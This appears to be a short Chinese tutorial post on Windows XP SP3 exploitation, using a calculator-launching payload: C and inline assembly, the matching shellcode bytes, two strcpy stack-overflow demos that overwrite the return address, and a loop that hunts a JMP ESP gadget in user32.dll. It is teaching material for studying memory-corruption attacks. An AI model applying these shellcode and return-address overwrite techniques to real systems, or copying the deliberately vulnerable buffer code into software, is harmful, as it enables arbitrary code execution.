标签:tip multiple bool 技术 crt type .com msvc code
以弹出计算器为例
.c
system("calc.exe"); exit(0);
.asm
__asm { xor eax, eax push eax mov byte ptr [esp], ‘l‘ mov byte ptr [esp+1], ‘l‘ push ‘d.tr‘ push ‘cvsm‘ // push msvcrt.dll 0 0, 12 bytes mov eax, esp push eax // string "msvcrt.dll" address mov eax, 7c801d7bh//LoadLibraryA msvcrt.dll call eax xor eax, eax push eax push ‘exe.‘ push ‘clac‘ // push calc.exe 0 0 0 0, 12 bytes mov eax, esp push eax // string "calc.exe" address mov eax,77BF93C7h//system call eax xor eax, eax push eax mov eax,77C09E7Eh//exit(0) call eax }
ShellCode
unsigned char uc[] = "\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E" "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0" "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50" "\xB8\xC7\x93\xBF\x77\xFF\xD0\x33\xC0\x50\xB8\x7E\x9E\xC0\x77\xFF" "\xD0"; typedef void (*FUNC)(); ((FUNC)&uc)();
Stack Overflow 1
void func1(char* s) { char buf[10]; strcpy(buf, s); } char ch[] = "0123456789123456";//integer multiple(4) DWORD* pEIP = (DWORD*)&ch[12];//retn address, +12 realease,+16 debug *pEIP = (DWORD)uc;//retn address point to ShellCode func1(ch);
ShellCode Overflow 2
HMODULE hMod = LoadLibrary("user32.dll"); unsigned char uc[] = "1234567890123456\x53\x93\xD2\x77\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E" "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0" "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50" "\xB8\xC7\x93\xBF\x77\xFF\xD0\x33\xC0\x50\xB8\x7E\x9E\xC0\x77\xFF" "\xD0"; func1((char*)uc);
XP SP3 相关地址取得
HMODULE hMod = LoadLibrary("msvcrt.dll"); if (hMod) { printf("%p\r\n", GetProcAddress(hMod, "system"));//77BF93C7 printf("%p\r\n", GetProcAddress(hMod, "exit"));//77C09E7E FreeLibrary(hMod); } HMODULE hMod = LoadLibrary("user32.dll"); if (hMod) { PBYTE pTravel = (PBYTE)hMod; BOOL bLoop = TRUE; for (DWORD i = 0; bLoop; i++) { //FF E0 JMP EAX //FF E1 JMP ECX //FF E2 JMP EDX //FF E3 JMP EBX //FF E4 JMP ESP //FF E5 JMP EBP //FF E6 JMP ESI //FF E7 JMP EDI //FF D0 CALL EAX //FF D1 CALL ECX //FF D2 CALL EDX //FF D3 CALL EBX //FF D4 CALL ESP //FF D5 CALL EBP //FF D6 CALL ESI //FF D7 CALL EDI try { if(pTravel[i] == 0xFF && pTravel[i+1] == 0xE4) { printf("%p\r\n", pTravel + i);//77D29353 break; } } catch(...) { bLoop = FALSE; } } FreeLibrary(hMod); }
标签:tip multiple bool 技术 crt type .com msvc code
原文地址:http://www.cnblogs.com/nonebutnow/p/6006182.html
